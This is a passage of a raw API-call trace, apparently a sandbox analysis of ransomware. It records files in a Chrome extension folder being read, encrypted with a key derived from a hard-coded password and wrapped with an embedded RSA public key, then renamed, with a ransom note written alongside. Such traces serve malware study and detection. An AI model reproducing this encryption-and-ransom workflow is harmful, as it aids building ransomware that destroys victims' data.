pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.523] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.523] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.523] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.523] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.523] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.523] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.524] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.524] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.524] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.524] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.524] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.524] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.524] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.525] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.525] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.525] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.525] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.525] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.525] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.526] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.526] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.526] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.526] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.526] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.526] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.526] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.526] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.526] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.526] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.526] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xbf, lpOverlapped=0x0) returned 1 [0263.526] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xbf, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0263.526] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0263.526] CloseHandle (hObject=0x5d60) returned 1 [0263.526] CloseHandle (hObject=0x5d5c) returned 1 [0263.526] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), bFailIfExists=0) returned 1 [0263.538] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json", dwFileAttributes=0x0) returned 1 [0263.538] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.gsg")) returned 1 [0263.539] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\messages.json.fuck")) returned 1 [0263.540] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.540] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.540] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.540] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.540] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.540] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\readme_back_files.htm")) returned 0xffffffff [0263.540] AreFileApisANSI () returned 1 [0263.540] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.541] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ml\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.541] GetFileType (hFile=0x5d64) returned 0x1 [0263.541] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.542] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.542] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.542] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.542] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.543] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.543] GetLastError () returned 0x0 [0263.543] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json")) returned 0x20 [0263.564] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json", dwFileAttributes=0x80) returned 1 [0263.564] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.565] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.566] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.566] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.568] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.568] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.568] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb378, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.568] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0263.568] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.568] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.568] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74c48) returned 1 [0263.569] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74c48, dwCertEncodingType=0x1, pInfo=0x2eaf300*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf330*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf338*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e780) returned 1 [0263.569] CryptEncrypt (in: hKey=0x2e7e780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 